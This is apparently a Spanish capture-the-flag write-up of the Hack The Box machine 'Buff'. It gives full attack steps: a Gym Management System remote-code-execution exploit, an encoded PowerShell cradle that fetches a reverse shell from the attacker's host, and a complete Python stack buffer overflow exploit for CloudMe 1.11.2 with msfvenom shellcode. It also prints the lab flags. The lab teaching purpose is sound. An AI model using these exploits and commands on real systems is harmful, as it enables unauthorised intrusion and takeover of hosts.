Conocimientos
-
Explotaci贸n Gym Management System (CMS)
-
Buffer Overflow - Stack Based Nivel F谩cil (Escalada de Privilegios)
Reconocimiento
Escaneo de puertos con nmap
Descubrimiento de puertos abiertos
nmap -p- --open --min-rate 5000 -n -Pn -sS 10.10.10.198 -oG openports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 17:16 GMT
Nmap scan report for 10.10.10.198
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
Escaneo de versi贸n y servicios de cada puerto
Puerto 8080 (HTTP)
Con whatweb analizo las tecnolog铆as que est谩 empleando el servidor web
whatweb http://10.10.10.198:8080
http://10.10.10.198:8080 [200 OK] Apache[2.4.43], Bootstrap, Cookies[sec_session_id], Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6], HttpOnly[sec_session_id], IP[10.10.10.198], JQuery[1.11.0,1.9.1], OpenSSL[1.1.1g], PHP[7.4.6], PasswordField[password], Script[text/JavaScript,text/javascript], Shopify, Title[mrb3n's Bro Hut], Vimeo, X-Powered-By[PHP/7.4.6], X-UA-Compatible[IE=edge]
La p谩gina principal se ve as铆:
En una secci贸n, se puede ver el CMS que se est谩 empleando con la versi贸n
Es vulnerable a una ejecuci贸n remota de comandos sin estar autenticado
searchsploit -m 48506
Al ejecutarlo obtengo una sesi贸n interactiva
python2 48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
锟絇NG
buff\shaun
C:\xampp\htdocs\gym\upload>
Me env铆o una pwsh con Invoke-ConPtyShell de nishang
C:\xampp\htdocs\gym\upload> powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADkALwBJAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABjAHAALgBwAHMAMQAiACkACgA=
Y la recibo en una sesi贸n de netcat
PS C:\xampp\htdocs\gym\upload>whoami
buff\shaun
Puedo ver la primera flag
PS C:\Users\shaun\Desktop> type user.txt
e3ea350fb743481f34778c0522e3cec2
Escalada
En el directorio de descargas, hay un instalable de CloudMe
PS C:\Users\shaun\Downloads> dir
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
Esta versi贸n es vulnerable a Buffer Overflow
searchsploit Cloudme
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
En una m谩quina Windows, instalo esa versi贸n para debbugearlo. Desde el Firewall de Windows Defender, creo una regla que se encargue de abrir el puerto 8888, que es el que utiliza por defecto este servicio
Aplico local port forwarding, para que el puerto que est谩 en local sea accesible desde otra interfaz
PS C:\Windows\system32> netsh interface portproxy add v4tov4 listenport=8888 listenaddress=10.10.0.128 connectport=8888 connectaddress=127.0.0.1
Para empezar, el script de python va a contener las variables globales y un payload para asegurarme de que se sobrescribe el EIP
import socket, signal, sys
def def_handler(sig, frame):
sys.exit(1)
# Ctrl+C
signal.signal(signal.SIGINT, def_handler)
# Variables Globales
ip = "10.10.0.128"
port = 8888
payload = b"A"*3000
def makeConnection():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
# Main
if __name__ == '__main__':
makeConnection()
Con Inmunity Debbuger, me attacheo al proceso
Creo un patr贸n para introducirlo como payload y encontrar el offset
pattern_create.rb -l 3000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9
Me quedo el valor del EIP
pattern_offset.rb -q 316A4230
[*] Exact match at offset 1052
Me interesa saber a donde se dirijen los caracteres sobrantes
offset = 1052
junk = b"A"*offset
payload = junk + b"B"*4 + b"C"*100
No es posible apuntar directamente a una ruta del stack, pero si a un opcode que haga el jump al ESP. Pero antes, conviene saber que caracteres no va a interpretar para agregarlos a una lista de badchars. Utilo mona.py, que es un addon que se puede instalar en el Inmunity Debbuger
PS C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands> iwr -uri https://raw.githubusercontent.com/corelan/mona/master/mona.py -o mona.py
!mona config -set workingfolder C:\Users\Usuario\Desktop\%p
!mona bytearray
El 煤nico que voy a eliminar es el null byte, aunque no es del todo necesario. Busco el offocode que hace el jmp al ESP
nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
Encuentro una DLL que no cuenta con ninguna protecci贸n
!mona modules
!mona find -s "\xff\xe4" -m Qt5Core.dll
Para esa DLL, me quedo con las direcciones con el atributo PAGE_EXECUTE_READ
!mona find -s "\xff\xe4" -m Qt5Core.dll
0x68a98a7b : "\xff\xe4" | {PAGE_EXECUTE_READ} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe\Qt5Core.dll)
0x68bad568 : "\xff\xe4" | {PAGE_EXECUTE_READ} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe\Qt5Core.dll)
Al poner un breakpoint en esa direcci贸n (F2) y volver a ejecutar el exploit, me aseguro que el EIP apunta al ESP
Con msfvenom genero un payload que se encargue de enviarme una reverse shell
msfvenom -p windows/shell_reverse_tcp --platform windows -a x86 LHOST=10.10.0.130 LPORT=443 -f python -b "\x00" -e x86/shikata_ga_nai
El exploit final quedar铆a as铆:
import socket, signal, sys
def def_handler(sig, frame):
sys.exit(1)
# Ctrl+C
signal.signal(signal.SIGINT, def_handler)
# Variables Globales
ip = "10.10.0.128"
port = 8888
offset = 1052
junk = b"A"*offset
bytearrays = (b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
b"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
eip = b"\x7b\x8a\xa9\x68" #0x68a98a7b
buf = b""
buf += b"\xbb\xe7\x60\xa9\x3a\xda\xc5\xd9\x74\x24\xf4\x5a"
buf += b"\x31\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x25"
buf += b"\x64\x4b\xcf\x55\x8d\x09\x30\xa5\x4e\x6e\xb8\x40"
buf += b"\x7f\xae\xde\x01\xd0\x1e\x94\x47\xdd\xd5\xf8\x73"
buf += b"\x56\x9b\xd4\x74\xdf\x16\x03\xbb\xe0\x0b\x77\xda"
buf += b"\x62\x56\xa4\x3c\x5a\x99\xb9\x3d\x9b\xc4\x30\x6f"
buf += b"\x74\x82\xe7\x9f\xf1\xde\x3b\x14\x49\xce\x3b\xc9"
buf += b"\x1a\xf1\x6a\x5c\x10\xa8\xac\x5f\xf5\xc0\xe4\x47"
buf += b"\x1a\xec\xbf\xfc\xe8\x9a\x41\xd4\x20\x62\xed\x19"
buf += b"\x8d\x91\xef\x5e\x2a\x4a\x9a\x96\x48\xf7\x9d\x6d"
buf += b"\x32\x23\x2b\x75\x94\xa0\x8b\x51\x24\x64\x4d\x12"
buf += b"\x2a\xc1\x19\x7c\x2f\xd4\xce\xf7\x4b\x5d\xf1\xd7"
buf += b"\xdd\x25\xd6\xf3\x86\xfe\x77\xa2\x62\x50\x87\xb4"
buf += b"\xcc\x0d\x2d\xbf\xe1\x5a\x5c\xe2\x6d\xae\x6d\x1c"
buf += b"\x6e\xb8\xe6\x6f\x5c\x67\x5d\xe7\xec\xe0\x7b\xf0"
buf += b"\x13\xdb\x3c\x6e\xea\xe4\x3c\xa7\x29\xb0\x6c\xdf"
buf += b"\x98\xb9\xe6\x1f\x24\x6c\xa8\x4f\x8a\xdf\x09\x3f"
buf += b"\x6a\xb0\xe1\x55\x65\xef\x12\x56\xaf\x98\xb9\xad"
buf += b"\x38\xad\x37\xad\x3a\xd9\x45\xad\x3b\xa1\xc3\x4b"
buf += b"\x51\xc5\x85\xc4\xce\x7c\x8c\x9e\x6f\x80\x1a\xdb"
buf += b"\xb0\x0a\xa9\x1c\x7e\xfb\xc4\x0e\x17\x0b\x93\x6c"
buf += b"\xbe\x14\x09\x18\x5c\x86\xd6\xd8\x2b\xbb\x40\x8f"
buf += b"\x7c\x0d\x99\x45\x91\x34\x33\x7b\x68\xa0\x7c\x3f"
buf += b"\xb7\x11\x82\xbe\x3a\x2d\xa0\xd0\x82\xae\xec\x84"
buf += b"\x5a\xf9\xba\x72\x1d\x53\x0d\x2c\xf7\x08\xc7\xb8"
buf += b"\x8e\x62\xd8\xbe\x8e\xae\xae\x5e\x3e\x07\xf7\x61"
buf += b"\x8f\xcf\xff\x1a\xed\x6f\xff\xf1\xb5\x80\x4a\x5b"
buf += b"\x9f\x08\x13\x0e\x9d\x54\xa4\xe5\xe2\x60\x27\x0f"
buf += b"\x9b\x96\x37\x7a\x9e\xd3\xff\x97\xd2\x4c\x6a\x97"
buf += b"\x41\x6c\xbf"
payload = junk + eip + b"\x90"*50 + buf
def makeConnection():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
# Main
if __name__ == '__main__':
makeConnection()
Gano acceso en mi m谩quina local
nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.0.130] from (UNKNOWN) [10.10.0.128] 50177
Microsoft Windows [Versin 10.0.19045.2604]
(c) Microsoft Corporation. Todos los derechos reservados.
C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe>
Modifico el shellcode para que apunte a mi interfaz de HTB y ejecuto para la m谩quina v铆ctima
Necesito montarme un servidor con chisel para poder tener conectividad con el puerto 8888
chisel server -p 1234 --reverse
Desde la m谩quina v铆ctima me conecto
PS C:\Temp> .\chisel.exe client 10.10.16.9:1234 R:socks
Ejecuto pasando por el proxy, y puedo ver la segunda flag
nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
6017190dd654891188f60765e18c0658